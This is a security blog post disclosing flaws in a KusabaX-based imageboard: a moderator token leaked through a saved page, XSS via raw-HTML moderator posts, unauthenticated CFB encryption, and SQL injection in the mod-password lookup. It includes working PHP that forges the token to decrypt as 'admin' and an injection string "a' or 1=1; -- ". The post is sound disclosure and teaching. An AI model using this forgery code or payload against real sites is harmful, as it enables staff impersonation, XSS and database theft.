2013 November 13

Misuse of Encryption in KusabaX

In this post I talk about vulnerabilities I found with a site using a fork of KusabaX, some relating to KusabaX's use of encryption, and I explain how these kinds of issues can make a site vulnerable. KusabaX is an open source imageboard that's used by many sites similar to 4chan.

A few months ago, someone decided to attempt to hack a popular imageboard website based on the KusabaX software. On most imageboards, discussion threads are short-lived. Only a set number of pages of threads are kept, often around 10. As more threads are started, threads are pushed off of the last page and deleted. Users often save the thread page in their browser if they wish to personally archive a thread. A user of the site contacted a site moderator asking if they had a saved copy of a certain recently removed thread. The moderator did, and sent the user their saved copy of the thread. As the user predicted, the moderator's saved copy of the thread was made while the moderator was authenticated to the site. The user wasn't successful in using the saved page to exploit the site, and eventually the saved copy of the page was forwarded along to someone who asked me to look into it and see if a danger existed in the first place.

A saved page doesn't contain the cookies that were used in the connection, so one can't just copy cookies from it to steal the authenticated session. A saved page could contain a user's anti-CSRF tokens, though making use of those requires more of an involved attack. (Also, KusabaX lacks any CSRF protection on in-thread moderator actions such as banning users anyway. It's vulnerable to certain CSRF attacks already. I reported the issue five months ago, but no fix has been released. Though that's not specifically what I want to focus on today.)

Imageboards often support tripcodes to identify users. A user enters their name as "Name#trip", the part following the "#" is hashed, and their name is displayed as "Name*!hEpdoZ.tHU*" with the tripcode hash visually formatted differently than the name. This is a simple identification system, but it has a number of weaknesses. One being that the moderator's name and tripcode password was in the name input box, as it usually is when using the site, at the time they saved the page, and it was kept in the saved copy of the page. (In most browsers, when you save a complete web page with its resources, the active document as it is in the browser is saved, rather than the exact html given by the webserver.) One of the page's scripts had hidden the posting form containing the tripcode password, but it was trivially recoverable from the html. This could be used to impersonate the moderator as a user, but the tripcode doesn't specially authenticate them as a moderator to the site, so moderator actions couldn't be done with just the tripcode.

Next, I noticed that the posting form had a few extra fields specific to a moderator session. One was labeled "Mod" with a value like "6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=". This is base64 encoded text, though unencoding it appeared to reveal 32 bytes of gibberish. Also present was a checkbox interestingly labeled "Raw HTML". In KusabaX, moderators are able to use this option to make posts with arbitrary html, so they can make posts with extra formatting options, iframes/embeds, etc. Getting access to a moderator account allows one to accomplish XSS attacks.

I made a POST request to the site with the "Mod" password field added using the value from the saved page, the "Raw HTML" checkbox, and a comment of <strong class="test">Test</strong>. My post resulted in bold text with the same html. (No, the site normally doesn't support HTML-like markup.) At this point, I'm able to successfully do XSS attacks. I could make a post with a <script> tag in a new thread containing malicious javascript, allowing me to rewrite the page to my will or cause people's browsers to leak more user or staff credentials to me. All that was required was this mod password.

Now so far, we have an attack, but not a particularly novel one. It's a mildly more interesting version of stealing an admin's cookies. Maybe there should be a discussion on what gets saved invisibly to users in a page when a user saves a page to disk. When someone saves a page to disk, I assume they generally don't imagine that data that can be used to exploit them (authentication or CSRF tokens) gets saved in the page too. Most people would probably benefit from using a simple "Save page as PDF" option instead, though saved PDFs do lack many of the niceties of HTML like flowing content that adapts to different screen sizes, or interactive javascript that may be included in the page.

There's something still bothering me. What was this mod password? Do moderators on KusabaX sites have to memorize this gibberish value? Where does it come from? Does KusabaX not use cookie-based authentication (or even HTTP authentication) like every other web application? KusabaX is made in PHP, which makes cookie-based sessions pretty easy with the $_SESSION global. I've experimented with running KusabaX before, and I don't quite remember having to put up with a giant mod password field. I guess I never bothered with using any of the mod posting form features before. I remember KusabaX having a moderator login page, allowing moderators to choose their own sensible passwords, and keeping moderators authenticated via cookie-based sessions as one would expect.

I inspected the saved page's javascript, and found some interesting stuff. When the page first loaded, it would make an AJAX request to "/md5.php?mod", and then set the "Mod" password field's value to the data received from the URL. If I browsed to "/md5.php?mod" myself, it would give me a gibberish base64 string of similar length, despite me not being authenticated to the site, but if I tried to make a "Raw HTML" post using this value, it wouldn't work. If I reload the page, I get a new but still worthless base64 string. I assume this page checks the user's session, and gave the moderator a base64 string that was somehow special. I looked in KusabaX source for a "md5.php", but didn't find any. That page is custom to this site, though most of these issues aren't. (I assume in stock KusabaX, some part of the moderator interface gives them the Mod password, and they have to copy and paste it into the correct field themselves to use it.) Next I remove the "?mod" parameter from the URL, and access md5.php itself. I get a simple page with three text boxes and three submit buttons. The first box is labeled "MD5". Not surprising, as that's the filename too, though I still don't see the connection between that and the "?mod" URL or the mod password. If I put text into that box and hit its button, I get a page with the hex-encoded MD5 hash of the string I put in.

The second box is labeled "MD5 Encrypt". Well, hash functions are sort of like one-way encryption, but I can't imagine why this would be different from the previous field. If I put text into this field and submit, I get a base64 string. If I decode that base64 string, I get binary gibberish that doesn't seem to have any obvious relation to the MD5 hash. Strange.

The third box is labeled "MD5 Decrypt". Danger, Will Robinson, danger! MD5 is a hashing function. There is no standard encryption/decryption algorithm called MD5. I have a feeling we're going to be dealing with homegrown encryption here, which too often means we're going to find something exploitably broken. If I put the base64 string I got from "MD5 Encrypt" into this field and hit submit, I get the original text back.

If I put any of the base64 strings I got from "/md5.php?mod" into "MD5 Decrypt", I got an empty string. If I put the mod password I got from the saved page in, I got what looked like the moderator's username. Let's say it was "bob". The source code of md5.php probably looks something like:

<?php
if ($_SERVER['QUERY_STRING'] == 'mod') {
	echo md5encrypt($_SESSION['modusername']);
} else {
	// md5, md5encrypt, md5decrypt forms
	// ...
}

So the thread page makes an AJAX request to a page which reads a value from $_SESSION, and then gives you an encrypted token to submit to the same server with your mod post later. Why not just read from $_SESSION later when processing mod posts?

I grepped through KusabaX's source on the strings "md5", "encrypt", and "decrypt", and quickly found the md5_encrypt and md5_decrypt functions inside inc/func/encryption.php. So this strangeness is common to KusabaX. Here's their source code:

function get_rnd_iv($iv_len) {
	$iv = '';
	while ($iv_len-- > 0) {
		$iv .= chr(mt_rand() & 0xff);
	}
	return $iv;
}
function md5_encrypt($plain_text, $password, $iv_len = 16) {
	$plain_text .= "\x13";
	$n = strlen($plain_text);
	if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
	$i = 0;
	$enc_text = get_rnd_iv($iv_len);
	$iv = substr($password ^ $enc_text, 0, 512);
	while ($i < $n) {
		$block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv));
		$enc_text .= $block;
		$iv = substr($block . $iv, 0, 512) ^ $password;
		$i += 16;
	}
	return base64_encode($enc_text);
}
function md5_decrypt($enc_text, $password, $iv_len = 16) {
	$enc_text = base64_decode($enc_text);
	$n = strlen($enc_text);
	$i = $iv_len;
	$plain_text = '';
	$iv = substr($password ^ substr($enc_text, 0, $iv_len), 0, 512);
	while ($i < $n) {
		$block = substr($enc_text, $i, 16);
		$plain_text .= $block ^ pack('H*', md5($iv));
		$iv = substr($block . $iv, 0, 512) ^ $password;
		$i += 16;
	}
	return preg_replace('/\\x13\\x00*$/', '', $plain_text);
}

After reviewing the code for a while, I realized that it's an implementation of Cipher-Feedback mode encryption, in 16 byte mode with a min(strlen($password), 512) byte shift register using MD5 as the block cipher (which works since CFB mode only uses its block cipher in the encrypt direction, even when decrypting). As far as I can tell, it's actually not too bad for what it is, besides that a cryptographically strong random number generator is not used (CFB encryption can be broken if the same IVs are used to encrypt two different things), and a chosen-ciphertext attack can determine the length of the password if it's shorter than 512 bytes, because the line $iv = substr($block . $iv, 0, 512) ^ $password; XORs the shift register against $password and in PHP, the result of XORing two strings has the length of the shorter string.

Now, the critical issue isn't in the implementation of that algorithm. Encryption was not needed in this situation. It is not important to try to keep the moderator's username secret from themselves! The important thing was that the mod password was supposed to be a token that could only be generated by the server, and the server could verify who it was for. The critical issue is that the wrong sort of algorithm was used. CFB encryption is not an authenticated encryption algorithm. It only guarantees confidentiality. What was needed here was integrity and authenticity guarantees. This is exactly what an HMAC is supposed to be used for.

So what does it mean that CFB encryption is not authenticated? It means that it's vulnerable to having its ciphertexts be manipulated to decrypt to something else. For example, if you know the plaintext of a specific ciphertext, you can transform the ciphertext to decrypt to a different plaintext of your choosing, without even knowing the key it was encrypted with.

Let's forget about this site's custom md5.php oracle, and just focus on vanilla KusabaX. Imagine if after an attacker exploits Bob's mod password for a while, the site admins figure out that Bob's account is compromised and remove his staff account. Now the mod password can't be used. If we know that "6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=" was the mod password of Bob and decrypts to his username "bob", then we can change it to decrypt to "admin" (a default staff account in KusabaX) by XORing the bytes of "bob" (and its padding) and "admin" together, and then XORing that result against the correct part of the ciphertext. Now we have a mod password that verifies us as "admin"! Here's an example of how to do this:

function pad_string($plain_text) {
	$plain_text .= "\x13";
	$n = strlen($plain_text);
	if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
	return $plain_text;
}

function main_example1() {
	$enc = '6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=';
	$encd = base64_decode($enc);

	$msg = pad_string("bob");
	$tgt = pad_string("admin");

	$xdf = $msg ^ $tgt;

	$encd = substr($encd, 0, 16) . (substr($encd, 16) ^ $xdf);

	print base64_encode($encd) . "\n";
}
main_example1();

If "6402b4gGUa1ALK2j1YxoUNR5WVt8QZWNMsBO6P4KC04=" decrypted to "bob" by some unknown key, then the result of this function will decrypt to "admin" by the same key.

It's also important to know that manipulating the ciphertext like this causes subsequent 16-byte sections to decrypt to gibberish. (The 16-byte sections that are at least min(strlen($password), 512) bytes after the last modified byte will decrypt normally again.) This is a standard caveat with manipulating Cipher-Feedback mode ciphertexts. If we can fit our changes in a 16-byte area and end the string within that area, then we don't need to worry about this. If this limit was an issue, then we could combine this attack with a playback attack, which this algorithm is vulnerable to as it's a self-synchronizing stream cipher. Here's some code that demonstrates this in further detail if you're curious.

Let's look up KusabaX's code that decrypts and verifies the mod password value, in inc/classes/posting.class.php:

		if (isset($_POST['modpassword'])) {

			$results = $tc_db->GetAll("SELECT `type`, `boards` FROM `" . KU_DBPREFIX . "staff` WHERE `username` = '" . md5_decrypt($_POST['modpassword'], KU_RANDOMSEED) . "' LIMIT 1");

There's an SQL injection vulnerability! Someone forgot to use mysql_real_escape_string() around the result of the decryption there. (Well, PDO ought to be used alternatively these days.) If you change the mod password to decrypt to "a' or 1=1; -- ", then you don't even need to know any staff usernames. It will always find a staff member for you. You could also use a blind SQL injection attack to slowly read any values from the database, if for some reason you weren't already satisfied with being able to do XSS attacks.

So in summary, if you can get the contents of the mod password field from any site staff member, even one with little or no extra privileges, or a past (possibly disgruntled) staff member that no longer even has privileges, from a KusabaX-based site, then you can perform XSS and SQL injection attacks freely by manipulating that mod password to decrypt to other values. Even if the admin revokes the access of the moderator who leaked the credential, the credential can be modified by an attacker to become valid again.

When you use encryption, you need to know exactly what it does for you, what it guarantees, and what its caveats are. (Does it keep the message secret, and who does it keep it secret from? Does it verify who the message is from? Does it verify that the message isn't manipulated or repeated?) Even if you're using a well-respected library that implements it for you (which you really should), it doesn't matter how correct its code is if you use the wrong type of algorithm for the situation.

I informed the admin of the site in question of all of this, and they patched their stuff including cutting out md5.php and the mod password field entirely in favor of using the already existing session data.